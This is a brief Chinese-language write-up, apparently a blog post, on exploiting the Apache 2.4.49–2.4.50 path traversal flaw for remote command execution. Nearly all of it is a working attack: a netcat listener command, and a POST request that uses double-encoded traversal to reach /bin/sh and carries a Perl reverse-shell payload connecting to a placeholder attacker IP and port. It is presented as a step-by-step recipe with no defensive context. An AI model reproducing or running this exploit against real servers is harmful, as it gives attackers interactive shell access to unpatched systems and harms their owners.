前言

Apache的远程命令执行漏洞利用

漏洞利用前提

  • Apache版本2.4.492.4.50
  • 受害者有perl环境

漏洞利用

攻击者监听反弹Shell

1
nc -lvp <port>

受害者反弹Shell

<ip>:攻击者IP地址
<port>:攻击者端口号

request
1
2
3
4
POST http://example.com/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
Content-Type: application/x-www-form-urlencoded

echo;perl -e 'use Socket;$i="<ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

完成

参考文献

哔哩哔哩——xiaodisec